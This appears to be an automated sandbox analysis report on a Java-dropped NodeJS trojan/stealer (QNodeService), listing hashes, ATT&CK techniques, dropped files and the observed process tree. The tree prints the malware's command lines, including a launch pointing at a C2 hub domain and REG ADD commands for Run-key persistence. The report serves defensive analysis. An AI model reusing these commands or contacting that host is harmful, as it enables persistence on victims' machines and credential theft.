qnodeservice | 0a27689398ba97857fe915d7bf1f3d62249d4b8f26ab713f55bdfb556733c9df

Analysis

max time kernel
76s
max time network
114s
platform
windows10_x64
resource
win10
submitted
28-10-2020 08:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

20201025_8428223.jar
Size

78KB
MD5

1dd1c8e9bfa0796e09e43d9ca2e7ff8a
SHA1

45084942b2387c4fd4fa7c751344efd126863c16
SHA256

0a27689398ba97857fe915d7bf1f3d62249d4b8f26ab713f55bdfb556733c9df
SHA512

9a9ae2cbd27bfa9e7fd3adae560419b2c377bff7b5b9199d82365d0e7627c0b36e0cb9af9008947fb715579b415ac381d86e1c0f2c3700f7f2d6652b27c05865

Score

10^/10

qnodeservice persistence spyware trojan

Malware Config

Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice
Executes dropped EXE 3 IoCs

Processes:

node.exenode.exenode.exe

pid process

2008 node.exe
3732 node.exe
1740 node.exe
Loads dropped DLL 6 IoCs

Processes:

node.exe

pid process

1740 node.exe
1740 node.exe
1740 node.exe
1740 node.exe
1740 node.exe
1740 node.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\30f3f008-19bc-4183-b563-ddabc3e29d93 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

JavaScript code in executable 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\node-v14.12.0-win-x64\node.exe	js
C:\Users\Admin\node-v14.12.0-win-x64\node.exe	js
C:\Users\Admin\node-v14.12.0-win-x64\node.exe	js

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 wtfismyip.com
29 wtfismyip.com

flow	ioc
28	wtfismyip.com
29	wtfismyip.com

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

node.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	node.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

node.exenode.exenode.exe

pid	process
2008	node.exe
2008	node.exe
2008	node.exe
2008	node.exe
3732	node.exe
3732	node.exe
3732	node.exe
3732	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe
1740	node.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

java.exejavaw.exenode.exenode.exenode.execmd.execmd.exe

description	pid	process	target process
PID 3992 wrote to memory of 3560	3992	java.exe	javaw.exe
PID 3992 wrote to memory of 3560	3992	java.exe	javaw.exe
PID 3560 wrote to memory of 2008	3560	javaw.exe	node.exe
PID 3560 wrote to memory of 2008	3560	javaw.exe	node.exe
PID 2008 wrote to memory of 3732	2008	node.exe	node.exe
PID 2008 wrote to memory of 3732	2008	node.exe	node.exe
PID 3732 wrote to memory of 1740	3732	node.exe	node.exe
PID 3732 wrote to memory of 1740	3732	node.exe	node.exe
PID 1740 wrote to memory of 728	1740	node.exe	cmd.exe
PID 1740 wrote to memory of 728	1740	node.exe	cmd.exe
PID 728 wrote to memory of 1316	728	cmd.exe	reg.exe
PID 728 wrote to memory of 1316	728	cmd.exe	reg.exe
PID 1740 wrote to memory of 3652	1740	node.exe	cmd.exe
PID 1740 wrote to memory of 3652	1740	node.exe	cmd.exe
PID 3652 wrote to memory of 540	3652	cmd.exe	reg.exe
PID 3652 wrote to memory of 540	3652	cmd.exe	reg.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\20201025_8428223.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:3992
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\bc568652.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2008
  - - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JQDjxC\boot.js --hub-domain empefarm.ddns.net
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3732
    - - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JQDjxC\boot.js --hub-domain empefarm.ddns.net
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:728
        
        C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
        7⤵
        Adds Run key to start application
        
        PID:1316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /F"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3652
        
        C:\Windows\system32\reg.exe
        
        REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "30f3f008-19bc-4183-b563-ddabc3e29d93" /F
        7⤵
        
        PID:540

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_qhub_node_JQDjxC\boot.js

MD5
3859487feb5152e9d1afc4f8cd320608

SHA1
7bf154c9ddf3a71abf15906cdb60773e8ae07b62

SHA256
8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

SHA512
826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

Download Submit
C:\Users\Admin\AppData\Local\Temp\bc568652.tmp

MD5
1dd1c8e9bfa0796e09e43d9ca2e7ff8a

SHA1
45084942b2387c4fd4fa7c751344efd126863c16

SHA256
0a27689398ba97857fe915d7bf1f3d62249d4b8f26ab713f55bdfb556733c9df

SHA512
9a9ae2cbd27bfa9e7fd3adae560419b2c377bff7b5b9199d82365d0e7627c0b36e0cb9af9008947fb715579b415ac381d86e1c0f2c3700f7f2d6652b27c05865

Download Submit
C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5
f0b11a5823c45fc2664e116dc0323bcb

SHA1
612339040c1f927ec62186cd5012f4bb9c53c1b9

SHA256
16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

SHA512
0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

Download Submit
C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5
f0b11a5823c45fc2664e116dc0323bcb

SHA1
612339040c1f927ec62186cd5012f4bb9c53c1b9

SHA256
16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

SHA512
0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

Download Submit
C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5
f0b11a5823c45fc2664e116dc0323bcb

SHA1
612339040c1f927ec62186cd5012f4bb9c53c1b9

SHA256
16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

SHA512
0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

Download Submit
\Users\Admin\AppData\Local\Temp\1740-115cd63e80fffa8a.node

MD5
df45601340083518d8bcc10ec848460b

SHA1
8613d6ab3040d57d241ed4a466c1fffb1b12455b

SHA256
eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed

SHA512
0e1e14dd82119dc822dccc4da4d64cce62a7796ec1157defa97b4bc29d767d164e6ef65861448b24c4972cc3919bf1583518ba725757c0f96af47a942380cd41

Download Submit
\Users\Admin\AppData\Local\Temp\1740-266911a1409b41e3.node

MD5
ee6e80bab410c751c935e6175acf8b5c

SHA1
c44cad6425db5c9c86351f9f9f7b019b876db528

SHA256
dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3

SHA512
c654c44cfe115a9c4f9eaf6ed4207511c17dc4eeb00441c2be6413d0a16c348fce0dcf282f2b9132948150e3541d248edd62b2e055a1cd902f80b9a67d2e1d77

Download Submit
\Users\Admin\AppData\Local\Temp\1740-33510b16f2099001.node

MD5
2e20508eac344dfead52bdc25b73a7fb

SHA1
c2918d63d3c0f14dce0552530ef0793f3a76bfa7

SHA256
500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98

SHA512
25f8c95eb38a39e7ea60145e598f8e00b3b4c61f9ef6ae1689d3be16da7bd7c0d57a55d0d06a8402af694be880408ca6ef01829b79d9768d09967db5e3a2b8de

Download Submit
\Users\Admin\AppData\Local\Temp\1740-7b51a2124cb8d061.node

MD5
911a4b53a8ffd6e01c0196c682f06a49

SHA1
5d0a4de0f72eede786da60fe49620e27b35d388d

SHA256
f39651fc570f90b0c01655c61c80c3956c6f6c54df5aa8e0aae626f2cb718008

SHA512
f2081eb8821f8289fdb1e907073a58381212af4872a6759c55f73667eba532bccea1e9f5695a31680708bf62e1b6da08f9e6bb21e1fec9db08ae81db57a9e6ea

Download Submit
\Users\Admin\AppData\Local\Temp\1740-8d076b234600e761.node

MD5
87f2661da9a09dc36a1e39b53692e172

SHA1
fc6a37bfcd72d7d70a3afb6fbd752bf1e0b0990f

SHA256
7d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea

SHA512
7187b2761245b470f4dbdbaa258e8d3cc1f2491bea2f7649212d8abcef1ccfb4c4b7fe4d0a37ca47840dd21eea9d799c94367af43c98027ba6f1247162a9e713

Download Submit
\Users\Admin\AppData\Local\Temp\1740-ddfdbe8d27323b80.node

MD5
f1c9cde23537dc338fb765f2c125f994

SHA1
6f290977d6e0666c4798b4bc17f640a18598a772

SHA256
8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b

SHA512
1bbdd3e50d4bcd09ca8e107596497ff3b20d82d728d485ca6eb1ee8660de0c3f4fe24dcc1657f2f59bc4f99fa2ddd525a0446eaed7999ed23b34fe8963750307

Download Submit
memory/540-189-0x0000000000000000-mapping.dmp

Download
memory/728-180-0x0000000000000000-mapping.dmp

Download
memory/1316-181-0x0000000000000000-mapping.dmp

Download
memory/1740-177-0x0000000000000000-mapping.dmp

Download
memory/1740-179-0x0000009841400000-0x0000009841401000-memory.dmp

Filesize
4KB

Download
memory/2008-172-0x000000C2BBFC0000-0x000000C2BBFC1000-memory.dmp

Filesize
4KB

Download
memory/2008-169-0x0000000000000000-mapping.dmp

Download
memory/3560-52-0x0000000000000000-mapping.dmp

Download
memory/3652-188-0x0000000000000000-mapping.dmp

Download
memory/3732-175-0x000001A3F27C0000-0x000001A3F27C1000-memory.dmp

Filesize
4KB

Download
memory/3732-173-0x0000000000000000-mapping.dmp

Download